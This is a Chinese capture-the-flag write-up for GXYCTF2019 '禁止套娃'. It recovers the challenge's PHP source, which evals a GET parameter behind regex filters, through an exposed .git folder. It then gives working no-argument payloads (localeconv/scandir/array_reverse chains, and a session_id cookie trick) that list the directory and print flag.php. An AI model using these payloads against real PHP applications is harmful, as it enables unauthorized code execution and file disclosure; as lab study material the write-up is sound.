[GXYCTF2019]禁止套娃 无回显 RCE 过滤__FILE__ dirname等

扫除git

通过githack

获取index.php

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

发现是命令执行 并且存在过滤

我们之前使用的 print_r(dirname(FILE));

在这里不可以使用

1.localeconv()

直接上payload了

print_r(localeconv());

通过current指定第一个 .

?exp=print_r(current(localeconv()));

这样我们配合 scandir 就可以实现 scandir('.')了

?exp=print_r(scandir(current(localeconv())));

这里我们无法使用[] 所以我们可以通过 array_reverse 倒序数组 然后next即可

?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
/?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

2.seesion_id

正常情况下 不开启 seesion 服务 但是如果我们可以通过 seesion_start()开启

我们就可以通过 seesion传递值

?exp=print_r(session_id(session_start()))


bp中加

Cookie: PHPSESSID=flag.php

然后一样通过 highlight_file即可

相关推荐
新玉54012 小时前
DVWA靶场
android·java·数据库·php
网络安全Jack4 小时前
网络安全 — 安全架构
web安全·php·安全架构
dal118网工任子仪6 小时前
128,【1】buuctf [极客大挑战 2019]PHP
开发语言·php
清风吹雨泡泡8 小时前
HCIA-10.生成树 STP 3/3
开发语言·php
不会敲代码的XW11 小时前
对比 LVS 负载均衡群集的 NAT 模式和 DR 模式,其各自的优势
开发语言·php
狄加山6751 天前
网络编程(预备知识)
服务器·网络·php
小鱼不会游泳1 天前
尝试分析一下go语言和php语言对建立mysql链接有什么不同
mysql·golang·php
云罗张晓_za8986681 天前
抖音“碰一碰”发视频:短视频社交的新玩法
android·c语言·网络·线性代数·矩阵·php
ETO_冬1 天前
Fastadmin根据链接参数显示不同列表格
javascript·php·thinkphp·fastadmin
doubt。1 天前
3.攻防世界 unseping(反序列化与魔术方法)
网络·web安全·网络安全·php·代码复审